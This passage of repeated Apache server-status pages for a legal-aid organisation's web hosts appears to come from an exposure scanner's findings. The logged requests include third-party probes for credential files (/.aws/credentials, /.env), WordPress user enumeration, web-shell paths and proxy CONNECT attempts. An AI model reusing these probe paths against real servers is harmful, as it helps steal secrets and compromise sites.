3.172.90.72http/1.1atlantalegalaid.org:8080GET /test.php HTTP/1.1 4-27116170/22/1969_ 2.65221520.00.9584.62 15.158.40.136http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-27-0/0/1719. 0.444358800.00.0084.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-27-0/0/2042. 4.88139500.00.0085.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-27106150/45/1817_ 5.3131400.02.0263.77 91.224.92.109http/1.1atlantalegalaid.org:8080OPTIONS / HTTP/1.1 8-27-0/0/1755. 0.005227700.00.0058.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-27108970/93/1466_ 8.2014022290.02.9152.87 3.172.90.105http/1.1atlantalegalaid.org:8080GET /admin/phpinfo.php HTTP/1.1 10-27109020/68/1460_ 10.6214002190.03.5850.45 3.172.90.101http/1.1atlantalegalaid.org:8080GET /.aws/credentials HTTP/1.1 11-27-0/0/1407. 4.394358700.00.0054.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-27-0/0/1118. 0.005227900.00.0038.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-27-0/0/539. 0.005227800.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-27109220/46/774_ 6.2213972600.02.1929.13 3.172.90.70http/1.1atlantalegalaid.org:8080GET /.env.backup HTTP/1.1 15-27109270/76/362_ 7.1113962150.02.607.23 3.172.90.80http/1.1atlantalegalaid.org:8080GET /config/.env HTTP/1.1 16-27-0/0/487. 0.005228300.00.0026.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-27-0/0/174. 0.005228200.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00161734200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00161734100.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00161734000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00161733900.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00161733800.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00161733600.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00161733700.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaf67a2dc8
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 21-Dec-2025 06:59:58 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 25 days 14 hours 23 minutes 6 seconds Server load: 0.00 0.00 0.00 Total accesses: 24065 - Total Traffic: 913.9 MB CPU Usage: u37.69 s2.97 cu0 cs0 - .00184% CPU load .0109 requests/sec - 433 B/second - 38.9 kB/request 1 requests currently being processed, 5 idle workers __W__......._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-2625480/0/2007_ 3.752095440.00.0072.97 15.158.38.119http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-2625450/1/1818_ 0.00172200.00.0064.66 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-26254026/26/1943W 0.070089.10.0967.26 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 3-2626020/0/1877_ 3.6420741500.00.0078.07 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766297725.973273038864135 4-2625340/5/1874_ 0.552066250.00.0480.68 3.172.17.87http/1.1elearning.alas.org:8080GET /login/forgot_password.php HTTP/1.1 5-25-0/0/1646. 5.931312100.00.0081.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-25-0/0/1935. 0.7920953680.00.0080.35 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-25-0/0/1737. 9.261312000.00.0060.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-25-0/0/1702. 2.2220951930.00.0056.86 130.176.218.136http/1.1cdn.atlantalegalaid.org:8080GET / HTTP/1.1 9-25-0/0/1345. 0.40209590.00.0048.65 130.176.218.136http/1.1cdn.atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-25-0/0/1360. 2.0720951430.00.0045.35 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766296095.649636030197143 11-24-0/0/1365. 6.379792300.00.0053.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-2625360/1/1049_ 0.00174000.00.0036.43 3.172.13.106http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 13-23-0/0/537. 0.0022760900.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.5222755600.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.0022760600.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-23-0/0/486. 1.8217489600.00.0026.85 149.40.49.208http/1.1 17-21-0/0/173. 3.2736289600.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00147346700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00147346600.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00147346500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00147346400.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00147346300.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00147346100.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00147346200.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea4db7ed47
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 19-Dec-2025 01:26:17 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 23 days 8 hours 49 minutes 26 seconds Server load: 0.00 0.00 0.00 Total accesses: 21975 - Total Traffic: 839.5 MB CPU Usage: u49.4 s3.93 cu0 cs0 - .00264% CPU load .0109 requests/sec - 436 B/second - 39.1 kB/request 1 requests currently being processed, 9 idle workers ____._..W.___..._............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-23118410/56/1859_ 6.79402720.02.5967.76 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-23172240/4/1625_ 0.3913793710.00.0759.49 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-23151370/25/1768_ 2.8088100.00.7460.28 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 3-23118390/134/1711_ 8.33392750.03.3772.69 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-23-0/0/1610. 1.49778600.00.0070.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-23151250/18/1518_ 1.4713791480.00.4875.07 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766106190.907111883163452 6-23-0/0/1733. 0.19778500.00.0072.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-23-0/0/1601. 3.053473600.00.0054.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-231240426/69/1565W 5.870089.12.0652.04 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 9-23-0/0/1198. 0.003479100.00.0045.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-23124090/77/1242_ 4.8088100.03.1742.14 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 11-23124140/73/1271_ 6.01376900.01.6448.93 15.158.40.136http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-23124190/85/870_ 6.53136900.02.5430.40 130.176.208.182http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-23-0/0/537. 0.003478900.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.523473500.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.003478600.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-23151630/50/483_ 1.82590.00.7726.85 130.176.208.182http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 17-21-0/0/173. 3.2717007500.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00128064700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00128064600.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00128064500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00128064400.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00128064300.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00128064100.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00128064200.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea47bb8e57
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 16-Dec-2025 21:40:06 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 21 days 5 hours 3 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 20672 - Total Traffic: 790.3 MB CPU Usage: u34.32 s2.73 cu0 cs0 - .00202% CPU load .0113 requests/sec - 452 B/second - 39.1 kB/request 1 requests currently being processed, 9 idle workers _____..W._.__...._.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-21290090/81/1722_ 3.53218500.01.7163.41 162.142.125.113http/1.1atlantalegalaid.org:8080GET /.well-known/security.txt HTTP/1.1 1-21322270/22/1545_ 0.16360000.00.0556.37 147.185.132.115http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-21289510/80/1650_ 3.5221911920.00.9157.16 162.142.125.113http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 3-21289520/41/1527_ 3.39219000.01.1767.43 162.142.125.113http/1.1atlantalegalaid.org:8080\x16\x03\x01 4-21322370/13/1534_ 0.01128600.00.4167.13 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 5-21-0/0/1457. 1.632081600.00.0064.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-21-0/0/1680. 3.242081800.00.0070.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-213099326/93/1541W 1.360089.20.5352.14 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-21-0/0/1471. 1.512081900.00.0048.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-21322420/54/1144_ 0.94329000.00.0644.42 173.212.221.249http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 10-21-0/0/1151. 0.002082000.00.0038.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-21322520/12/1166_ 0.0021842890.00.6045.90 162.142.125.113http/1.1atlantalegalaid.org:8080\x16\x03\x01 12-21322570/11/779_ 0.00219100.00.0127.79 162.142.125.113http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-21-0/0/536. 7.382081700.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-20-0/0/724. 0.538185100.00.0026.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-20-0/0/285. 2.986972700.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-20-0/0/433. 4.115772400.00.0026.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-21289740/42/130_ 2.76361700.00.964.86 59.88.37.57http/1.1 18-8-0/0/6. 0.00109427500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00109427400.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00109427300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00109427200.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00109427100.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00109426900.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00109427000.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea6ba9a565
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 13-Dec-2025 10:01:24 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 17 days 17 hours 24 minutes 32 seconds Server load: 0.00 0.00 0.00 Total accesses: 16962 - Total Traffic: 656.5 MB CPU Usage: u46.11 s3.64 cu0 cs0 - .00325% CPU load .0111 requests/sec - 449 B/second - 39.6 kB/request 1 requests currently being processed, 9 idle workers _______._W_..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1863610/22/1441_ 3.603753760.01.0553.64 18.68.55.19http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-1863660/46/1267_ 1.433751530.00.5446.62 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1765619701.487224102020263 2-1863710/10/1319_ 1.1380172220.00.4046.60 130.176.212.15http/1.1atlantalegalaid.org:8080GET /bypass.php HTTP/1.1 3-1865240/14/1230_ 1.44409700.00.3446.09 45.156.129.134http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-1866910/49/1245_ 3.3189500.00.7056.85 149.50.103.48http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-1863600/14/1225_ 2.4056000.00.6255.28 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 6-1863590/10/1383_ 2.2380162330.00.4062.00 130.176.212.46http/1.1atlantalegalaid.org:8080GET /wp-includes/js/js420.php HTTP/1.1 7-18-0/0/1265. 0.55801400.00.0045.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-1867050/13/1278_ 1.9780162250.00.6641.41 130.176.212.14http/1.1atlantalegalaid.org:8080GET /wp-includes/rk2.php HTTP/1.1 9-18683526/32/891W 1.130089.20.4836.91 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 10-1868400/4/989_ 0.52166400.00.2032.53 135.119.89.57http/1.1atlantalegalaid.org:8080GET /manager/text/list HTTP/1.1 11-17-0/0/935. 3.098261000.00.0037.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-16-0/0/597. 6.9811233500.00.0021.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-15-0/0/258. 0.0021272500.00.008.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.0021272700.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.9319134000.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17-0/0/403. 8.806400200.00.0024.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-15-0/0/54. 5.2425514400.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0079315300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0079315200.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0079315100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0079315000.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0079314900.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0079314700.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0079314800.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feae1b5630d
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 13-Dec-2025 07:16:20 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 17 days 14 hours 39 minutes 28 seconds Server load: 0.00 0.00 0.00 Total accesses: 16778 - Total Traffic: 651.0 MB CPU Usage: u41.74 s3.22 cu0 cs0 - .00295% CPU load .011 requests/sec - 448 B/second - 39.7 kB/request 1 requests currently being processed, 5 idle workers _W__.__......................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1863610/2/1421_ 0.0062900.00.0052.59 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 1-18636625/26/1247W 0.040058.30.0646.14 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 2-1863710/1/1310_ 0.00173000.00.0046.20 3.144.78.162http/1.1atlantalegalaid.org:8080GET /cgi-bin/authLogin.cgi HTTP/1.1 3-1865240/1/1217_ 0.0062900.00.0045.76 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 4-17-0/0/1196. 5.323260800.00.0056.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-1863600/2/1213_ 0.49225100.00.0354.68 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-1863590/2/1375_ 0.0069700.00.0061.61 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 7-17-0/0/1261. 0.1430782720.00.0045.47 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-17-0/0/1265. 3.73307800.00.0040.75 3.137.73.221http/1.1atlantalegalaid.org:8080\x16\x03\x01 9-17-0/0/859. 3.54307800.00.0036.43 3.137.73.221http/1.1atlantalegalaid.org:8080SSH-2.0-Go 10-17-0/0/985. 1.6630782620.00.0032.33 15.158.226.76http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/feed/ HTTP/1.1 11-17-0/0/935. 3.097270600.00.0037.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-16-0/0/597. 6.9810243100.00.0021.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-15-0/0/258. 0.0020282100.00.008.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.0020282300.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.9318143600.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17-0/0/403. 8.805409800.00.0024.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-15-0/0/54. 5.2424524000.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0078324900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0078324800.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0078324700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0078324600.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0078324500.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0078324300.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0078324400.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea0b4c4e9e
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 11-Dec-2025 09:14:48 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 15 days 16 hours 37 minutes 56 seconds Server load: 0.00 0.00 0.00 Total accesses: 14744 - Total Traffic: 565.0 MB CPU Usage: u30.49 s2.45 cu0 cs0 - .00243% CPU load .0109 requests/sec - 436 B/second - 39.2 kB/request 1 requests currently being processed, 9 idle workers _____._W__......_............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-16235700/25/1242_ 3.9015212390.01.5243.84 15.158.226.76http/1.1atlantalegalaid.org:8080GET /public/laravel-file-manager/tinymce HTTP/1.1 1-16236120/11/1071_ 1.47242800.00.4639.29 176.65.132.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-16236180/8/1119_ 1.24406100.00.4639.32 3.172.13.106http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 3-16235640/7/1019_ 2.28153214430.00.3439.89 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1765442954.427985906600952 4-16236230/7/1061_ 1.00195700.00.3349.56 5.187.35.158http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-16-0/0/1037. 0.80977500.00.0048.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-16236330/6/1196_ 0.63190200.00.2153.33 45.156.128.37http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-162358326/31/1138W 1.230089.10.3639.53 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-16235690/44/1092_ 2.43714650.00.3833.44 130.176.208.182http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-16236380/2/751_ 0.10527500.00.0031.75 157.245.97.232http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 10-15-0/0/913. 4.223712700.00.0029.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-15-0/0/815. 0.003713000.00.0032.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-15-0/0/547. 1.213346900.00.0019.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-15-0/0/258. 0.003712900.00.008.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.003713100.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.931574400.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-16235630/10/249_ 1.26527600.00.4617.63 157.245.97.232http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-15-0/0/54. 5.247954800.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0061755700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0061755600.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0061755500.00.000.00 